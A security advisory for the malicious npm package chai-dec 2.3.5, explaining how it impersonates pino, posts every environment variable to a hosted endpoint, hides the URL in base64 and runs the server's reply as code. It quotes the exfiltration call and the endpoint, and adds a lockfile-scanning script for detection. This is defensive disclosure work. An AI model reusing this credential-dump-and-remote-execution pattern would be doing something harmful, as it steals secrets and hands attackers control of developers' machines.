Malicious package

chai-dec (npm)

Malicious code in chai-dec (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5606

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall chai-dec

What this malware does

chai-dec impersonates the chai/pino ecosystem: the package name rides on chai, while the package.json keywords and the export (module.exports.pino = middleware) masquerade as the pino logger.

When the exported middleware factory is invoked (the standard Express-style usage), index.js spawns a detached Node child process running lib/initializeCaller.js. That script POSTs the entire process.env object to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df via axios.post(apiEndpoint, { ...process.env }, { headers: { 'x-secret-header': 'secret' } }), leaking every environment variable on the consumer's machine (AWS/GitHub/npm tokens, DB credentials, CI secrets, etc.). The destination URL is stored as a base64 blob in a locally shadowed process.env.DEV_API_KEY and decoded with atob at runtime to evade static review.

The HTTP response body is then passed to new Function('require', response.data) and invoked with the real require, giving the operator of the endpoint arbitrary remote code execution in the consumer process with full Node privileges. In short, this is a typosquat lure carrying a credential-harvesting and dynamic-RCE payload.

Malicious versions

1 flagged
2.3.5
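
npm uninstall chai-dec only drops a direct dependency, so it is worth confirming the package is not also installed transitively. The following is an added example, not code from this advisory or from npm: it searches a parsed package-lock.json for any install of chai-dec and marks the flagged version 2.3.5. The function name, the sample lockfile and its other package names are assumptions made for illustration; any hit, flagged or not, should be removed.

```javascript
'use strict';

const BAD_NAME = 'chai-dec';   // package name from this advisory
const FLAGGED = ['2.3.5'];     // version this advisory flags

// Returns [{ path, version, flagged }] for every install of BAD_NAME, direct
// or transitive, in a parsed package-lock.json (lockfileVersion 1, 2 or 3).
function findMalicious(lock) {
  const hits = [];
  const record = (path, version) =>
    hits.push({ path, version, flagged: FLAGGED.includes(version) });

  // v2/v3: flat "packages" map keyed by install path, e.g.
  // "node_modules/a/node_modules/chai-dec". An entry carries its own "name"
  // when the folder name differs from the package name (npm alias).
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    const name = meta.name || key.split('node_modules/').pop();
    if (name === BAD_NAME) record(key, meta.version);
  }

  // v1: nested "dependencies" tree; walk it recursively.
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      if (name === BAD_NAME) record([...trail, name].join(' > '), meta.version);
      walk(meta.dependencies, [...trail, name]);
    }
  };
  if (!lock.packages) walk(lock.dependencies, []);
  return hits;
}

// Constructed sample lockfile (package names other than chai-dec are hypothetical).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/chai': { version: '0.0.0-example' },
    'node_modules/demo-logger/node_modules/chai-dec': { version: '2.3.5' },
  },
};

console.log(findMalicious(SAMPLE_LOCK));
```

For a real project, pass the result of JSON.parse on the contents of package-lock.json to findMalicious.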

Indicators of compromise (SHA-256)

5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3

Frequently asked questions

No. chai-dec on npm has been identified as a malicious package (version 2.3.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005693

Credits

  • Amazon Inspector · finder

chai-dec (npm) malicious package — MAL-2026-5606 | O3 Security